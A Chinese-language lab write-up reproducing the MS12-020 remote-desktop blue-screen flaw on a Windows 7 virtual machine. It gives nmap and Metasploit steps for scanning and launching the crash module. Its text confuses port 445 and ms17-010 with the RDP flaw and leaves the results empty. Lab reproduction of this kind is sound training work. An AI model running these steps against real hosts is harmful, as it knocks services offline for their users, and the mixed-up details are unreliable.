02 攻防实验二：ms12-020（死亡蓝屏）漏洞复现_ms12-020复现

影响范围

windows xp 、2003、2008、Windows 7，该漏洞针对于 3389 的远程桌面服务

实验目的

利用已经披露的漏洞报告，复现微软 windows 7 系统利用 ms12-020 漏洞导致的系统蓝屏

实验要求

使 Windows 7 系统蓝屏

实验环境

同一局域网下的两设备，为保证安全性，这里的两台设备采用的是虚拟机

实验设备

数据来源

目标主机提供

实验步骤

1. 切换管理员账户

sudo su

2. 端口扫描

使用 nmap 进行端口扫描，发现目标主机 445 端口开启，那么该主机下可能存在 ms17-010 漏洞。

nmap 192.168.1.128

 3. 进入武器库，加载 ms17-010 攻击模块

msfconsole

search ms12-020

4. 对 445 端口进行漏洞扫

        4.1 加载扫描工具

use 3

        4.2 查看需要配置的参数

        4.3 设置目标主机地址

        4.4 运行扫描，查看目标主机下是否存在该漏洞

run

5. 加载 ms12-020 攻击模块

检查发现该目标主机下存在该漏洞，加载攻击模块

use 4

 6. 设置主机地址为目标主机

set rhosts 192.168.1.128

7. 攻击

run

实验结果

实验总结

MS12-020是一个3389远程桌面rdp协议的一个漏洞 攻击者通过特意构造的rdp数据包发送给靶机3389端口，造成系统崩溃